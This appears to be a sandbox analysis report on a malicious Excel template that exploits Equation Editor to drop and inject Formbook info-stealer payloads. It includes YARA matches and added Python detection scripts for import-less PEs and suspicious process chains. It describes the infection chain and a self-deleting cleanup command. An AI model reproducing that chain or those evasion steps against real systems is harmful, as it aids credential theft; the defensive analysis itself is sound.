Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0262D47D
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02625485
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02601489
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02636540
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025F351F
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0260C5F0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_026A3A83
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02617B00
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025EFBD7
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0267DBDA
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0269CBA4
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025FC85C
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0261286D
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0268F8EE
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02675955
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_026069FE
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0269098E
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025F29B2
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0260EE4C
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02622E2F
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0261DF7C
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02600F3F
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_025FCD5B
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02620D3B
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0268FDDD
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008D166
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008E376
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008E6D5
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008D773
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_00072D90
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_00079E30
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0008BFA6
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_00072FB0
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: String function: 0099DF5C appears 107 times
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: String function: 00A0F970 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: String function: 0099E2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: String function: 009E373B appears 238 times
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Code function: String function: 009E3F92 appears 108 times
Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 025EE2A8 appears 38 times
Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 025EDF5C appears 118 times
Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0263373B appears 238 times
Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 02633F92 appears 108 times
Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0265F970 appears 81 times
Source: FB_BFF5.tmp.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FB_BFF5.tmp.exe.5.dr | Static PE information: No import functions for PE file found
Source: FB_C479.tmp.exe.5.dr | Static PE information: No import functions for PE file found
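"No import functions for PE file found" on both dropped FB_*.tmp.exe files is a static tell worth checking yourself: a PE whose import data directory is empty cannot have been linked against kernel32 in the normal way and must resolve the APIs it needs at run time, which is why an import-less executable is treated as packed or as a loader stub. The following Python is an added example, not the sandbox's code and not the pefile library: it walks the DOS header, PE signature and optional header to read the import data directory of a PE32 or PE32+ file, and builds a constructed, non-loadable PE32 header as sample input so it runs offline. The fixture builder and the wording of the verdicts are this example's own.

```python
"""Added example (not the sandbox's or any library's code): a minimal PE header
walk that answers "does this file import anything?" without pefile. The fixture
builder produces a constructed, non-loadable header used only as sample input."""
import struct
import sys

DOS_HEADER_SIZE = 64
IMAGE_DIRECTORY_ENTRY_IMPORT = 1          # slot index in the optional header's data directories
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def import_directory(data):
    """Return (rva, size) of the import directory, or None when the PE has none.

    Raises ValueError for anything that is not a well-formed PE header.
    """
    if len(data) < DOS_HEADER_SIZE or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    opt_size = struct.unpack_from("<HHIIIHH", data, coff)[5]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        nrva_off, dir_off = 92, 96        # NumberOfRvaAndSizes, first data directory
    elif magic == PE32PLUS_MAGIC:
        nrva_off, dir_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", data, opt + nrva_off)[0]
    entry = opt + dir_off + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT
    # A directory table too short to hold the import slot means no imports at all.
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_IMPORT or entry + 8 > opt + opt_size:
        return None
    rva, size = struct.unpack_from("<II", data, entry)
    return None if rva == 0 and size == 0 else (rva, size)


def classify(data):
    """One-line verdict in the spirit of the static-information rows above."""
    try:
        d = import_directory(data)
    except (ValueError, struct.error):
        return "not a PE"
    if d is None:
        return "no import functions (resolves APIs itself: packed, or a loader stub)"
    return "imports present at RVA 0x%X (%d bytes)" % d


def build_minimal_pe(import_rva=0, import_size=0):
    """Constructed fixture: a PE32 header with no sections, so it is not loadable."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, DOS_HEADER_SIZE)          # e_lfanew
    n_dirs = 16
    opt_size = 96 + 8 * n_dirs                                   # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, n_dirs)
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT,
                     import_rva, import_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe()
    print(classify(blob))
```

Run it with a path argument to check a real dropped file; without one it classifies the constructed fixture. An empty import directory is a strong but not sufficient indicator: a few legitimate tools also resolve everything through GetProcAddress, so treat the verdict as a reason to unpack, not as a conviction on its own.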
Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: New_1007572_021[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: tynex.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: tynex.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_C479.tmp.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_C479.tmp.exe.5.dr Static PE information: Section .text
            Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
            Source: classification engine Classification label: mal100.troj.expl.evad.winXLTX@13/9@2/1
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe Code function: 5_2_00401000 FindResourceA,SizeofResource,LoadResource,LockResource,GetTempPathA,GetTempFileNameA,MoveFileExA,MoveFileExA,sprintf,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,FreeResource,MoveFileExA,ExitProcess,
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$New_1007572_021.xltx
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE214.tmp
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\Public\tynex.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
            Source: C:\Users\Public\tynex.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (reported twice)
            Source: New_1007572_021.xltx ReversingLabs: Detection: 39%
            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
            Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\tynex.exe C:\Users\Public\tynex.exe
            Source: C:\Users\Public\tynex.exe Process created: C:\Users\user\AppData\Local\Temp\tynex.exe C:\Users\user\AppData\Local\Temp\tynex.exe
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe Process created: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe Process created: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
            Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
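The process-creation rows above are the most useful part of this report for a detection engineer: Equation Editor spawning a binary from C:\Users\Public, two generations of tynex.exe in user-writable directories, explorer.exe launching a script host with no script, and cmd.exe deleting the dropped payload. The script below is an added example, not part of the Joe Sandbox report or of the sample: it rebuilds the parent/child chain from those rows (transcribed here as constructed input, with the missing column separator restored) and applies four triage rules whose names are this script's own labels, not sandbox signature names.

```python
"""Rebuild the process chain from the 'Process created' rows of the report
above and apply a few triage rules to it. Added example, not part of the
Joe Sandbox report; the rule names below are this script's own labels."""
import re

# Constructed input: the report's 'Process created' rows, transcribed with the
# column separator restored ('Source: <parent> Process created: <image> <cmdline>').
REPORT_LINES = r"""
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\tynex.exe C:\Users\Public\tynex.exe
Source: C:\Users\Public\tynex.exe Process created: C:\Users\user\AppData\Local\Temp\tynex.exe C:\Users\user\AppData\Local\Temp\tynex.exe
Source: C:\Users\user\AppData\Local\Temp\tynex.exe Process created: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\tynex.exe Process created: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe'
"""

# One row: parent image, child image (first path ending in .exe), rest is the command line.
ROW_RE = re.compile(
    r"^Source:\s*(?P<parent>.+?)\s*Process created:\s*"
    r"(?P<image>[A-Za-z]:\\.*?\.exe)\s*(?P<cmdline>.*)$",
    re.IGNORECASE,
)

# Office hosts: a child process under EQNEDT32.EXE is the CVE-2017-11882 pattern this report flags.
OFFICE_HOSTS = {"eqnedt32.exe", "excel.exe", "winword.exe", "powerpnt.exe"}
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\temp\\")
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(text):
    """Return (parent, image, cmdline) triples for every row matching ROW_RE."""
    edges = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edges.append((m["parent"].strip(), m["image"], m["cmdline"].strip()))
    return edges


def ancestry(edges, image):
    """Walk parent links from `image` up to the root; returns basenames root-first."""
    parent_of = {child: parent for parent, child, _ in edges}
    chain = [image]
    while chain[-1] in parent_of and parent_of[chain[-1]] != "unknown" and len(chain) < 64:
        chain.append(parent_of[chain[-1]])
    return [basename(p) for p in reversed(chain)]


def evaluate(edges):
    """Apply the triage rules; each finding is (rule, parent, child)."""
    findings = []
    for parent, image, cmdline in edges:
        p, c = basename(parent), basename(image)
        if p in OFFICE_HOSTS:
            findings.append(("office_child_process", parent, image))
        if any(marker in image.lower() for marker in USER_WRITABLE):
            findings.append(("exec_from_user_writable_dir", parent, image))
        # A script host started without a script file suggests code was injected into it.
        if c in SCRIPT_HOSTS and not re.search(r"\.(js|jse|vbs|vbe|wsf)\b", cmdline, re.I):
            findings.append(("script_host_without_script", parent, image))
        if c == "cmd.exe" and re.search(r"/c\s+del\b", cmdline, re.I):
            findings.append(("cmd_del_dropped_file", parent, image))
    return findings


if __name__ == "__main__":
    edges = parse(REPORT_LINES)
    for rule, parent, child in evaluate(edges):
        print(f"{rule:28} {basename(parent)} -> {basename(child)}")
    print(" -> ".join(ancestry(edges, r"C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe")))
```

Run stand-alone it prints seven findings and the chain eqnedt32.exe -> tynex.exe -> tynex.exe -> fb_c479.tmp.exe; the cscript.exe branch hangs off explorer.exe with no parent link back to the dropper, which is exactly what the process-injection signatures in this report predict.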
            Source: C:\Users\user\AppData\Local\Temp\tynex.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\Public\tynex.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: wntdll.pdb source: FB_C479.tmp.exe, cscript.exe
            Source: Binary string: cscript.pdbN source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
